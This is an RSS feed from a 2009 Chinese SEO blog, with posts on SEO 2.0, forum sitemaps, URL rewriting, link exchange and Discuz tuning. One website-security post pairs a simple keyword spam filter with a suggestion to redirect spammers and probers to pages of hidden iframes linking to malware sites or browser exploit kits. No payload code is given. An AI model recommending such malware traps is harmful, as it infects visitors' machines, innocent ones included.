&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-23 14:21:15]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/wangzhananquan/"><![CDATA[网站安全]]></category><source url="http://www.001pp.com/asp/rss.asp?id=133"><![CDATA[网站安全]]></source></item><item><title><![CDATA[SEO2.0，你升级了么]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/SEO2.015.html]]></link><description><![CDATA[<p>那日网上闲逛，不小心看到一个新的概念，seo2.0，似乎国内没什么人提及&ldquo;seo2.0&rdquo;，这里事先撇清下关系，我个人是很反感所谓web2.0这类的概念噱头的。不过，对于seo2.0这个新鲜名词，事实上业内的许多前辈已经不知不觉地在实践着，老猪认为，在操作层面上，seo2.0的核心可以归纳为3点：更强调用户体验、链接策略的变革、结构化的数据。</p>
<p>一、更强调用户体验。</p>
<p>Seo界有句话，叫做seo的最高境界就是放弃seo，这句话虽然有点故弄玄虚的扯淡&hellip;&hellip;听着感觉深刻，不过却怎么扯都可以&hellip;&hellip;不过里面有层意思确实应该注意的。Seo不是面向搜索引擎优化，最终的目的还是应该面向用户，知道这点的人虽多，但实际上真正如此做的人更少，很多朋友真正关心的不是我的内容是否为用户所需要，而是我的页面结构，我的关键词分布是否为搜索引擎所喜好，而在seo2.0时代，用户的体验被再次强调，seo2.0强调用户订阅，强调转化率，强调回头客，这些都是建立在你的网络拥有良好用户体验的基础上，seo2.0强调用户参与，互动，也是为了建立更好的用户体验，此外，即使对于搜索引擎而言，一个不通过搜索引擎都可以获得流量的站点，排名绝对不会低到哪里去，如果说以前搜索引擎的这种说法只是一种官方辞令，目的是为了让seoer别去太关注black hat手段的话，那么现在，搜索引擎已经完善了种种做法，通过用户体验来调整搜索引擎排名的技术已经非常成熟了，页面层次上，搜索引擎可以监测你那个结果点击了那个链接，桌面上，google，百度的各类桌面软件，特别是工具条，也可以进行此项监测，迄今为之，yahoo,google,baidu已经都推出了自己的访问统计，而有了这玩意，用户体验的监测就更加容易了。Seoer，我们还能嘴上强调用户体验，头上还带black hat么？</p>
<p>二、链接策略的变革。</p>
<p>Google排名最重要的算法之一pr算法基本上就是基于外链，虽然江湖传闻pr即将退出历史舞台，但是外链的重要性不言而喻，几年前的外链以交换友情链接为主，以让dmoz收录为荣，还有部分人使用留言，论坛群发这样的spam手段，但在seo2.0时代，这类的链接逐渐被搜索引擎视为低质量的链接了，更加优质的外链来源。来自博客正文的链接&hellip;&hellip;旁人写博客引用你的网址，完全可以说明你的内容的权威性，还有del.icio.us，国内的百度搜藏，艾瑞搜藏这样的书签网站&hellip;&hellip;被人收藏得越多，自然越能说明你的内容为用户所欢迎。同样优质的链接还有google rss reader这样的在线rss阅读站点以及抓虾这种聚合网站。所以，在赢得用户体验的前提下，鼓励用户收藏，订阅，对你的网站排名大有帮助。</p>
<p>三、结构化的数据。</p>
<p>什么是结构化的数据，简单地讲，xml就是一种较好的结构化数据存储形式，这里大家最常见的就是rss协议就是一种结构化的数据，这种xml直接可以告诉搜索引擎标题，正文，关键词，创建日期，地址，根据rss协议扩充的googlesitemap，百度newsop，这些东东甚至可以告诉搜索引擎那个内容是你重点推荐的（google sitemap的priority属性），或者是什么样的内容是网友所认可的（百度bbs协议的精华，点击，回复，这点我在《论坛如何进行搜索引擎优化》一文中有过论述）。博客网站的权重之所以较高，除了更新频繁，链接结构好意外，结构化的数据也是一个很重要的原因，面对rss或者类似的结构化数据，搜索引擎无需对网页乱七八糟的代码进行解析&mdash;&mdash;机器毕竟是机器，机器喜欢有规则的东西&mdash;&mdash;，哦这边漏掉了一种重要的结构化数据，xhtml 1.0 这种结构化数据是目前应用最广的，也就是大家口中的div+css，作为xml+xslt的过渡版本，就页面结构而言，采用xhtml 1.0规范的网站应该说是目前搜索引擎最喜欢的结构了。</p>
<p>&nbsp;</p>
<p>我是在这个博客看到seo2.0的，可惜是英文。http://seo2.0.onreact.com/不过Charles对里面的一篇文章进行了翻译，建议大家有空去看下。http://www.kseo.cn/post/207.html，嘿嘿，主动无偿提供链接，我这也是在实践seo2.0</p>
<p>&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-23 14:16:19]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[优秀seo从业人员的六项修炼]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/youxiuseocongyerenyuan14.html]]></link><description><![CDATA[<p>（搜索引擎优化）seo最近在国内获得了极大的关注，越来越多的站长、电子商务人员、程序员从事这一行业证明自己的价值获得丰厚的报酬，但是，什么样的人才会成为优秀的seoer？或者说，怎样成为一个优秀的seo从业人员？猪认为，一个优秀的seo从业人员，需要完成以下六项修炼</p>
<p>一、理论基础</p>
<p>这是最基本的知识储备要求。你必须熟悉搜索引擎的工作原理，熟悉搜索引擎排序的，这样一旦客户问及：为什么我的网站排名那么低或者为什么我的竞争对手能排在第一位？你才能给予客户一个令人信服的&hellip;&hellip;至少是看上去令人信服的的解释，并由此制定出详尽的优化计划</p>
<p>二、编程基础</p>
<p>如果你不明白&lt;h1&gt;&lt;strong&gt;&lt;b&gt;这几种标签到底是什么意思，很可能只是认为都是加粗的标签而用滥用这些标签导致惩罚；如果你熟悉div+css，那你才能指导客户方面的程序员编写出真正是实现&ldquo;样式和内容分离的&rdquo;，&ldquo;xml化&rdquo;的代码，而不是一堆仍然把样式style定义在页面的div，如果你会某项脚本编程就更加完美了。可以更加有效地指导程序员编写出更受搜索引擎和用户需要的功能。</p>
<p>三、良好的媒体关系</p>
<p>这里的媒体包括传统纸质媒体以及目前的互联网资讯媒体。媒体推广在短期内带来的流量总是非常可观的，而对于seo而言，媒体的网站作为新闻源又有着相对较高的权重，如果你拥有良好的媒体关系，能通过软文让你的链接出现在新闻页面，你的网站排名增长指日可待。这项技能应用得最熟练的当属&ldquo;王通&rdquo;前辈了。不信可以去百度新闻搜索下&ldquo;王通&rdquo;二字。</p>
<p>四、优秀的推销能力</p>
<p>seo水平再好，能给客户带再大的好处，客户没兴趣也枉然&hellip;&hellip;目前客户对于seo服务还不了解，而由于竞争激烈，导致部分seo服务公司又竞相降价，这样的环境想为客户提供优秀的服务同时又获得合理的报酬需要从业者具有优秀的推销能力足以说服客户。</p>
<p>五、扎实的文字功底</p>
<p>blog+软文算是目前比较主流的seo手段之一，但是也并非什么人都可以写软文的，如果软文文理不畅，无法清楚地向读者传递有用的信息，读者连看都看不下去，自然也谈不上转载了。</p>
<p>六、良好的心态</p>
<p>seo是个长期的过程，多方面长时间的优化才能获得效果，一遇到搜索引擎算法的重大更新，排名还有下降的可能，因此在整个过程中，排名可能会有大的波动，如果心情随着排名而波动，排名一掉就觉得人生无趣首页被k就觉得万念俱灰，那么这样的朋友是不适合做seo的。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-23 14:15:34]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[论坛如何进行搜索引擎优化]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/luntansousuoyinqingyouhua13.html]]></link><description><![CDATA[<p>搜索引擎讨厌包含了一堆参数的动态页面&hellip;&hellip;论坛就这样&hellip;&hellip;</p>
<p>搜索引擎不喜欢文章页面里充满有没有价值的内容&hellip;&hellip;论坛很多水贴里不是&ldquo;顶&rdquo;就是路过&hellip;&hellip;</p>
<p>可以说，解决这2个问题，论坛的搜索引擎优化就有希望了，长期以来，论坛难以进行seo的根源，就在于过多参数的动态页面制约了论坛的内容的收录，有价值的页面淹没于众多水贴中无法体现价值，而&ldquo;互联网论坛收录开放协议&rdquo;的诞生则可以完美第解决这一点。&ldquo;互联网论坛收录开放协议&rdquo;是一个类似rss的xml文件，整个文件和rss最大的不同是增加几个特殊的标签，这是几个值得我们注意的标签:</p>
<p><span class="style1"><span style="color: #0000ff">&lt;</span><span class="tagr" style="color: #990000">bbs:reply</span><span style="color: #0000ff">&gt;</span></span>&mdash;&mdash;帖子总的回复数，不包括主贴。<br />
<span class="style1"><span style="color: #0000ff">&lt;</span><span class="tagr" style="color: #990000">bbs:hit</span><span style="color: #0000ff">&gt;</span></span>&mdash;&mdash;帖子总的查看次数。</p>
<p>这两个标签就是rss所没有的，判断一个帖子是否有价值的标准，从点击率，回复数就可见一斑了。<br />
<span class="style1"><span style="color: #0000ff">&lt;</span><span class="tagr" style="color: #990000">bbs:mainLen</span><span style="color: #0000ff">&gt;</span></span>&mdash;&mdash;帖子主贴的长度，单位字节 。</p>
<p>可以猜测的是，帖子长度太短的必然是水贴。</p>
<p><span class="style1"><span style="color: #0000ff">&lt;</span><span class="tagr" style="color: #990000">bbs:pick</span><span style="color: #0000ff">&gt;</span></span>&mdash;&mdash;是否设为精华，精华标为 1 ，非精华标为 0 。</p>
<p>精华帖代表论坛管理者对于本帖的推荐，搜索引擎收录起来权重自然比较高。</p>
<p>放置了整个收录协议以后，文章最初所将的两个问题，收录以及有质量内容的推荐就可以得到解决，笔者的论坛为动网7.0，由于动网7.0本身没有自带百度新闻协议，于是笔者自己写了个动网论坛百度互联网论坛收录开放协议插件，结果效果十分显著。有兴趣的朋友，可以去中国站长站下载试用<a href="http://down.chinaz.com/soft/19792.htm"><font color="#0033cc">http://down.chinaz.com/soft/19792.htm</font></a></p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-23 14:14:44]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[网站静态化的三种方式优劣对比]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/wangzhanjingtaihua12.html]]></link><description><![CDATA[<p>一提到搜索引擎优化，很多人认为页面静态化是一项重要的功能，那么你是否了解静态化，有哪些静态化方式？本文就此对三种网站静态化的方式做个简单的比较。</p>
<p>第一种是纯手工制作页面。这种方法的好处是，空间成本较低，不需要支持数据库的空间，但是缺点显而易见，不利于页面比较多的网站，同时页面维护相对困难，对于一些个人网站，或者简单的企业介绍站点，可以用这种方式。</p>
<p>第二种是通过后台模板技术，读取数据库记录生成静态页面，这种方式的好处相对于动态页面服务器资源消耗小，基本上不用读取数据库，缺点是生成的静态页面将占用过多的服务器空间，在记录较多的情况下，每次服务器都要进行长时间的重新生成页面工作。此外，对于技术上的要求也比较高。</p>
<p>第3种方式则是最近比较流行的url rewrite 了，也就是伪静态，本质上整个站点其实是动态的，但是通过url rewrite，原本动态的页面看上去编程了静态页面,伪静态具有很明显的好处，更新便捷，因为实际上还是动态页面。占用空间小，但是伪静态有2个不好的地方，一个是相对动态页面而言，由于增加了地址重写的步骤，会比原本的动态网站消耗更多的服务器资源，一旦访问量比较大，问题会比较严重，还有一个问题是伪静态页面需要对原本的程序进行改动，使输出的动态地址变成伪装后的静态地址，同时url 重写都是使用正则表达式，因此需要站长具有一定的对程序进行二次开发的能力</p>
<p><strong>附表 三种静态化方式的比较</strong></p>
<p>
<table style="width: 100%; border-collapse: collapse">
    <tbody>
        <tr>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">&nbsp;</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">手工静态化</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">模板静态化</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">url rewrite伪静态</td>
        </tr>
        <tr>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">占用硬盘空间</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">少</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">多</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">少</td>
        </tr>
        <tr>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">占用服务器资源</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">小</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">小</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">大</td>
        </tr>
        <tr>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">技术难度</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">简单</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">难</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">难</td>
        </tr>
        <tr>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">后期维护</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">难</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">中</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">简单</td>
        </tr>
        <tr>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">需要学习的内容</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">html</td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">
            <p>模板技术</p>
            <p>&nbsp;在线生成文件</p>
            </td>
            <td style="border-right: #666666 1px solid; border-top: #666666 1px solid; border-left: #666666 1px solid; border-bottom: #666666 1px solid">正则表达式</td>
        </tr>
    </tbody>
</table>
</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-23 14:12:36]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/chengxuyouhua/"><![CDATA[程序优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=132"><![CDATA[程序优化]]></source></item><item><title><![CDATA[挤压seo—危及seo市场的几种搜索引擎新技术]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/sousuoyinqingxinjishu11.html]]></link><description><![CDATA[<p>某种意义上说，seo从业者寄生在搜索引擎这个庞然大物的身上，因此每次搜索引擎技术的发展对seoer而言都是很不愉快的事情，这意味着以往的很多手法变得不那么好用了。就目前来看，有以下这么几种搜索引擎技术发展的趋向可能给seo从业人员带来负面的影响。</p>
<p>一、用户参与索引的排序</p>
<p>事实上这应该不算新技术，只是随着google SearchWiKi对国内的用户的正式开通，百度点击作弊的出现才引起了更多人的关注，早期谷歌和百度都收集了用户对搜索结果的点击情况，但是并没有很明显的应用在serp的排序中，而百度点击作弊和searchwiki的出现，则意味着，除了语义分析以及超链分析之外，用户成为了第三个需要考虑的要素，甚至可能成为决定性的要素，倘若这成为现实，无疑将严重挤压了seoer的生存空间，但目前看来，在解决作弊问题之前&mdash;&mdash;百度点击器的泛滥证明了这项技术的脆弱&mdash;&mdash;这项技术仍然难以成为未来搜索引擎的主流。而且用户选择的结果也有一定的局限性，大多数用户只是根据serp呈现的网站标题和描述决定是否点击该结果的，而以这样的诱因评价一个网站质量高低明显有失偏颇。</p>
<p style="text-align: center"><img height="467" alt="searchwiki" width="656" border="1" src="/uploadfiles/2009-1/20090121207915.jpg" /></p>
<p style="text-align: center">google SearchWiKi</p>
<p>二、个性化的搜索结果呈现</p>
<p>假如你是百度知道用户，集中回答过某些方面的问题，在你登陆&ldquo;我的知道&rdquo;后，你会看到&ldquo;为我推荐的提问&rdquo;已经为你推荐了你所可能有能力回答的相关问题，这就是所谓的数据挖掘技术&mdash;&mdash;可以从海量的数据中，推荐给你个性化的内容，当当的图书推荐也是如此，而且你和网站的互动越频繁，所推荐给你的内容，也就越可能是你感兴趣的，而在未来的某一天，可能你会发现，你在搜索&ldquo;房产&rdquo;的时候，搜索引擎呈现给你的结果更多地偏向于本地区的新盘信息，而你另外一个朋友搜索房产的时候，更多的是偏向本地&ldquo;租房&rdquo;&ldquo;二手房&rdquo;信息。假如你搜索过关节疼痛，若干时间后你又搜索&ldquo;北京医院&rdquo;，搜索引擎可能为你提供的是有关北京地区骨科医院的信息，而你另外一个朋友所获得的serp却满满的都是主治前列腺的医院！这在现在只是一个想象，但是随着web挖掘技术的发展，计算机存储运算能力的提升，技术上和硬件上的瓶颈都有可能被消除，进而根据你的搜索历史为你提供个性化的搜索服务&hellip;&hellip;更要命的是，百度似乎已经开始往这个方向走了，百度知道的相关推荐功能，以及年初网页搜索中部分关键词分地区呈现不同结果功能的推出，都印证了这一点。</p>
<p style="text-align: center"><img height="292" alt="百度知道为我推荐的提问" width="161" border="1" src="/uploadfiles/2009-1/20090121796951.jpg" /></p>
<p style="text-align: center">百度为我推荐的提问</p>
<p style="text-align: center"><img height="271" alt="当当的图书推荐" width="568" border="1" src="/uploadfiles/2009-1/20090121589027.jpg" /></p>
<p style="text-align: center">当当的图书推荐</p>
<p>三、理解自然语言的搜索引擎</p>
<p>第一项是现在，第二项是以后，第三项可能就是未来了，理解自然语言的搜索引擎，迄今为止仍然看不到任何技术上应用的可能性，有朝一日也许你坐在电脑前打开搜索引擎，用麦克风对它发出指令&ldquo;给我找家水煮鱼做得最好的川菜馆&rdquo;，搜索引擎马上蹦跶出你周围的餐馆地址&hellip;&hellip;这仍是个梦想，不过也说不准再过个三五年就实现了，毕竟，科技发展的速度越来越快，五十年前的谁会想到互联网会发展成今天这个模样？五百年前有谁想到现代工业文明能为人类创造如此多的奇迹和财富？</p>
<p style="text-align: center"><img height="295" alt="图灵" width="239" border="1" src="/uploadfiles/2009-1/20090121612678.jpg" /></p>
<p style="text-align: center">图灵，人工智能之父</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-21 19:49:45]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[理想的友情链接标准]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/youqinglianjiebiaozhun9.html]]></link><description><![CDATA[<p>1、代码有效</p>
<p>友情链接代码以规范的html代码表现在页面中，即&lt;a href=&quot;链接&quot;&gt;文字&lt;/a&gt;，不出现nofollow，不使用iframe,js调用链接。不使用robots协议控制链出。</p>
<p>2、主题相关</p>
<p>与你的站内具有主题相关性或地区相关性。</p>
<p>3、表现良好</p>
<p>这里的表现指搜索引擎上的表现，包括搜索引擎中必须有索引，site数量不小于100（部分页面本身较少的网站不在其列），在百度中执行site算符，网站首页不出现在结果中可以作为是否被降权的参考。</p>
<p>4、指标过硬</p>
<p>主要指pr，一般要求相符且真实。在外链上，如果对方的外链乱七八糟则可能对你的网站贡献度极小，最好对方的导出链接应该是高质量的，且数量不大于100</p>
<p>5、内容安全</p>
<p>如果无法符合第二条主题相关，则你应该保证对方的内容是安全的，包括在谷歌使用site算符未发现病毒，包括不属于私服，搬家等等容易优化过度的站点，并检查对方页面是否存在明显的优化痕迹，例如隐藏文本，过度加粗等以防遭受池鱼之灾难<br />
&nbsp;</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-19 22:57:20]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[discuz论坛优化手记]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/discuz youhua8.html]]></link><description><![CDATA[<p>1、开启伪静态 不赘述</p>
<p>2、增加百度互联网论坛收录协议 dizcus本身的百度互联网论坛收录协议不符合百度的要求，自己重新进行改写，生成的sitemap应该可以定时更新，并且位于根目录，文件名必须是baidusitemap.xml</p>
<p>3、使用robots协议排除镜像页面，使用robots协议排除动态页面防止镜像页面收录 discuz有部分目录和页面的内容是和帖子内容重复的，例如存档文件夹/archiver/，开启伪静态之后，原有的动态页面 viewthread.php</p>
<p>4、重复页面使用301转向到镜像页面 redirect.php这个页面是论坛一些快速跳转的链接，例如上一主题，下一主题，最新回复主题等，内容也是帖子页面，应改成301重定向到目标帖子，避免出现镜像内容。</p>
<p>5、为首页设定关键词 discuz的整站使用同一套meta，应修改index.php,viewthread.php， forumdisplay.php，手工定义meta内容。</p>
<p>6、为帖子增加关键词功能，并根据关键词获得相关帖子 原有奇虎的tag功能可以用的话，直接使用奇虎的tag作为关键词也可，不可用的话只有自己写了。</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-19 22:56:43]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[除了pr0以外，pr几的网站最多呢]]></title><link><![CDATA[http://www.001pp.com/sousuoyinqingyouhua/wangzhanpr10.html]]></link><description><![CDATA[<p>好奇地统计了一下，结果很令人意外，却又很符合统计规律，结果如下图（统计网站数量为3451个，通过搜索引擎随机抽取）</p>
<p><br />
<img height="256" width="474" alt="" src="/uploadfiles/2009-1/2009119151444.jpg" /></p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-19 22:55:00]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/sousuoyinqingyouhua/"><![CDATA[搜索引擎优化]]></category><source url="http://www.001pp.com/asp/rss.asp?id=134"><![CDATA[搜索引擎优化]]></source></item><item><title><![CDATA[将非法信息拒之门外]]></title><link><![CDATA[http://www.001pp.com/wangzhananquan/feifaxinxi7.html]]></link><description><![CDATA[<p>1月11号突然接到西部数码的警告信，告知万能百度因为出现非法信息而被关停，令我大吃一惊，看了随信发的链接才知道，原来某个朋友搜索了一个av女星的名字。而在平时，也经常看到开放的评论和留言板中出现很多群发的非法信息，令人不胜其烦。而且，为了维护社会的和谐稳定，这些违法信息经常会给你的服务器带来一些可大可小的麻烦，在实践中，如果不进行信息审核的话，一般能采用的只能是特征识别的方式，一旦出现某个敏感词，则判断为spam。这是我所写的一段审核代码</p>
<blockquote>
<p>&lsquo;检查狗日的spam<br />
function isspam(str)<br />
&nbsp;dim w,i,td<br />
&nbsp;td=false<br />
&nbsp;w=array(&quot;敏感词1&quot;,&quot;敏感词2&quot;,&quot;敏感词3&quot;)<br />
&nbsp;for i=0 to ubound(w)<br />
&nbsp;&nbsp;if instr(str,w(i))&gt;0 then td=true<br />
&nbsp;next<br />
&nbsp;isspam=td<br />
end function</p>
</blockquote>
<p>对于这段代码而言，可以按照敏感词在搜索引擎出现的索引数量多寡，排列敏感词在数组w中的位置前后，来减少程序的开销，但是这段代码所起的作用并没有想象中的大，非法信息的发布者通常会锲而不舍地试探你的敏感词表，通过各种符号插入进行规避，而如果要考虑这些，程序的开销会变得极大。对于这种情况，个人认为，应该一次性就将对方打疼，让对方不敢再嗅探，所使用的办法就是，一旦判断isspam=true，则跳转到一个病毒页面，里面嵌入所有能从各种反病毒软件，例如超级巡警，360安全卫士所屏蔽的恶意网站的0px iframe，用可能中毒的风险，来打消对方进一步的念头，具体的代码大家可以自己发挥。</p>
<p>这种办法还可以引申到更多的应用领域，例如某些tools kid 的安全嗅探令你不胜其烦，你可以构建一个蜜罐，例如一个虚假的admin目录，目录的首页为一个充满病毒IFRAME的页面或者最新的浏览器漏洞利用工具？</p>注意咯~：本文欢迎转载，但必须保留文中链接或以链接形式注明来源(<a href="http://www.001pp.com/">飞翔的猪圈</a> http://www.001pp.com/)哦(*^__^*) <br />喜欢我们的文章么？那么请订阅我们吧：<A href="http://mail.qq.com/cgi-bin/feed?u=http://www.001pp.com/asp/rss.asp">用qq邮箱订阅本站</a>)]]></description><pubDate><![CDATA[2009-01-16 21:18:25]]></pubDate><author><![CDATA[www.001pp.com]]></author><category domain="http://www.001pp.com/wangzhananquan/"><![CDATA[网站安全]]></category><source url="http://www.001pp.com/asp/rss.asp?id=133"><![CDATA[网站安全]]></source></item><item><title><![CDATA[可能要买的四本书]]></title><link><![CDATA[http://www.001pp.com/chengxuyouhua/sibenshu6.html]]></link><description><![CDATA[<p>《.net2.0 面向对象编程揭秘》我在新华书店看了第三第四章，感觉不能站在书店里看，作者对.net面向对象编程浸蕴颇深，而单看书中几个相当浅显易懂茅塞顿开的比喻更是不容易，复杂事情简单话需要的功底就更深了，值得买回来深研一番。</p>
<p><img style="width: 199px; height: 237px" alt="" src="/uploadfiles/2009-1/2009114685121.jpg" /></p>
<p>《web信息架构&middot;设计大型网站》动物系列的译著，粗略地看了一般，作者对web信息架构进行了系统性的阐述，貌似翻译有点生硬？</p>
<p><img height="264" width="200" alt="" src="/uploadfiles/2009-1/2009114759852.jpg" /></p>
<p>《精通Web Analytics&mdash;&mdash;来自专家的最佳Web分析策略》<a href="http://www.dbanotes.net/"><font color="#000000">dbanotes.net</font></a>&nbsp;介绍的，看名字就觉得很有趣</p>
<p><img height="285" width="200" alt="" src="/uploadfiles/2009-1/2009114839539.jpg" /></p>
<p>《网络营销实战密码&mdash;&mdash;策略.技巧.案例》zac 的新书，很是期待。质量应该有保障。</p>
<p><img style="width: 167px; height: 288px" alt="" src="/uploadfiles/2009-1/2009114556244.jpg" /></p>
